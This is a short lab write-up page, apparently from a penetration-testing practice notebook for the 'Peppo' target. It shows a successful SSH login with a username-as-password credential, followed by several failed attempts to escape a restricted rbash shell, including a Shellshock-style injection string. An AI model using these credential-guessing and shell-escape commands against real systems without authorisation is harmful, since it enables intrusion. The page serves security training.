InfoSec LAB

Peppo_SSH

Created: 2 min read

SSH

Testing weak credential for the discovered eleanor user against the target SSH server

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/peppo]
└─$ ssh eleanor@$IP                                                                      
The authenticity of host '192.168.154.60 (192.168.154.60)' can't be established.
ED25519 key fingerprint is SHA256:GrHKbhpl4waMainGkiieqFVD5jgXi12zVmCIya8UR7M.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.154.60' (ED25519) to the list of known hosts.
eleanor@192.168.154.60's password: eleanor
Linux peppo 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
eleanor@peppo:~$ whoami
-rbash: whoami: command not found
eleanor@peppo:~$ hostname
-rbash: hostname: command not found
eleanor@peppo:~$ ipconfig
-rbash: ipconfig: command not found

The password of the eleanor user was eleanor.Username_As_Password SSH session established, but it would appear that it’s a limited session, noted by the rbash

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/peppo]
└─$ sshpass -p eleanor ssh eleanor@$IP -t "bash"
rbash: bash: command not found
Connection to 192.168.154.60 closed.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/peppo]
└─$ sshpass -p eleanor ssh eleanor@$IP -t "sh"
rbash: sh: command not found
Connection to 192.168.154.60 closed.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/peppo]
└─$ sshpass -p eleanor ssh eleanor@$IP -t "/bin/sh"
rbash: /bin/sh: restricted: cannot specify `/' in command names
Connection to 192.168.154.60 closed.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/peppo]
└─$ sshpass -p eleanor ssh eleanor@$IP -t "bash --noprofile"
rbash: bash: command not found
Connection to 192.168.154.60 closed.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/peppo]
└─$ sshpass -p eleanor ssh eleanor@$IP -t "() { :; }; /bash"
rbash: -c: line 0: syntax error near unexpected token `)'
rbash: -c: line 0: `() { :; }; /bash'
Connection to 192.168.154.60 closed.

None of the SSH techniques worked Moving on to the advanced techniques

Interactive Graph View

Backlinks